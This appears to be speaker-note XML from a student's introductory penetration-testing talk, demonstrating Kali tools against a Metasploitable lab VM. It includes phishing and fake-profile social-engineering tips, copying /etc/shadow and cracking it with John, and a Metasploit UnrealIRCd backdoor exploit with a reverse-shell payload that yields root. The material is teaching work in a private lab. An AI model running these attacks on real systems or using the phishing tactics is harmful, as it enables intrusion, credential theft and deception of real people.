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hammingtonjane@outlook.co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Disclaimer: this is my first time giving a technical talk, especially one that is an hour long. Please be gentle! We’re all here to learn.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38674d7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38674d7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Technically Metasploitable 2… oh well</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploitable is an intentionally vulnerability virtual machine that I’ll be running some attacks on. It’s set up in my test environment as just another VM.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We’ll see later how it interacts with Kali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36e8366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36e8366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a:t>Maltego (demo’s by Ronni in her talk two weeks ago on OSINT): OSINT visualizer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GoPhish: open source phishing campaign framework</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LUCY: phishing campaign service provider (real-world examples of attacks, employee training)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394decd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394decd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Estelle, Joey’s agent from Friends OMEGALUL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394decd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394decd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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create fake social media profiles to 'friend' the targets and send them links or malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.</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Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.</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Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.</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View target photos looking for employee access card badges and familiarise yourself with building interiors.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do example of company LinkedIn for LCE</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do a Facebook / Twitter / LinkedIn search of Ana</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show Da-Bois.csv (Bill Gates, Linus Torvalds, Steve Jobs)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hammingtonjane@outlook.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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436e83666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436e83666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Vulnerability Analysis - doing testing of the infrastructure to discover flaws, active / passive recon, validation of the flaws - correlate findings between tools, categorize findings / making sure vulns are actually vulns, and doing research of vulns to see how exploitable they are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“NICK-toe”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Make sure that Metasploitable is running</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To run Nikto, use “nikto -h 192.168.126.130”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-h = host</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Point out the that it finds the version of Apache, the web server it’s running, and that it’s out of date. Multiple vulnerabilities from OSVDB. List of 29 items to be looked at on the host.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38674d76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38674d76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can still sign up for free home use for scanning up to a certain amount of hosts with Nessus and Nexpose, although for the demo I’ll be using OpenVAS (not pre-installed with Kali)</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Openvas-start</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>admin/admin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scans -&gt; Tasks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploitable: 192.168.126.130</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scan already ran. Scans -&gt; Reports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>21 High, 30 Medium, and 3 Low issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Methods of how attackers could exploit the system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Click on the date to get the detailed report</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Show the results menu. Look at the backdoor. Jake could get into your house using this if he knows the door (the port number)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Add a note. Further research required on this. Gotta remove this backdoor.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Export as a PDF and show it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Report comes into play later. Sets you up for success. KEY!!!!!</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36e83666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36e83666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39a5bf0b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39a5bf0b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Password menu on Kali main screen</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>wordslists</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cat rockyou.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ls metasploit to see the dictionary files it uses to run its attacks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39a5bf0b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39a5bf0b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cewl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.126.130 -w meta.txt -d 3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-w  = write (to a file)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-d 3 = analyze the website to 3 levels of depth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John-Demo in Documents</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cp /etc/shadow phile.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>john phile.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Should get root’s password in a few seconds (toor) (john --show phile.txt)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Make 2 new users (useradd, passwd) one with an ez password, one with a not so easy one</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy /etc/shadow to phile.txt again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Can delete users using userdel “username”</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36e83666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36e83666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Exploit = run into a target system to check whether it’s vulnerable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Payload = sent into the target system to demonstrate that the exploit was successful by executing on the target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METASPLOIT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Start up by just clicking on the icon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>help shows all commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>show exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit name, disclosure date, effectiveness, and a description of what the exploit achieves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Can filter a search down to specific OSs search win8 and search win7</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let’s try doing something to Metasploitable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Let’s try to find a weakness in its IRC (Internet Relay Chat)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Search irc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We found a lot of cool ones for different OSs. Let’s use the one for UNIX: use exploit/unix/irc/unreal_ircd_3281_backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We’ve loaded now, so now I need to select my target. I know that my Metasploitable system is running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.126.130.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In this case, it’s an automatic target, so we can just type in “set target 0”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s use the “show payloads” command - how can we get into this backdoor?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s now get more info on the reverse shell payload. Type “info cmd/unix/reverse”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cool. So it doesn’t need admin access, and it opens a shell on port 4444. Let’s go with this. Type “set payload cmd/unix/reverse”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How to use this combination of exploit and payload? Type “show options”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Gotta set remote and local host addresses (RHOST and LHOST)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Metasploitable: set rhost 192.168.126.130</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali: set lhost 192.168.126.135</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type “exploit”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit opened the sockets and established the Telnet connection. Gives a prompt that we now have a command shell on the remote system. GETDABBEDON LET’S GO DUDE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Check to see if it’s actually the remote system: ifconfig eth0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whoami = root OH SHIT SON</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have access to the whole system now. #gehackt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Tons more you can do. Can get in multiple different ways. There are other exploits like samba vulnerabilities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g437f270df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437f270df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Tons of research can be done in this field. Academia is important for the development of our field. Having said that, I’m going to explore the options of doing this for a living in the industry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43a3b4af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43a3b4af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LCE vs. TIAA - LCE has more restrictions. WAY more. Certifications get in the way of jobs and such. Wasn’t even able to work on a specific project or be on team. Though I learned so much.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Volatile - your contract could end at any given moment. Give e.g. of LCE and the Forge.mil project. They really didn’t know if their contract was going to expire after the year was up.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You have to protect yourself with contracting. Companies you work for really help you a lot, though. Pre-engagement interactions are so important so you get PAID and you don’t get into any legal trouble (e.g., gotta delete all these files I found / properly dispose of them)</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439e2a976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39e2a976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new practical exams for this stuff now. Previously you could be a CEH just by doing the training / passing the MC. The full cert now requires the practical exam. Root as many boxes as possible in ~6 hours in their “cyber range”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ECSA is a little similar. More focus on the defense side of things (same goes for CND)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LPT = the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pinnacle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
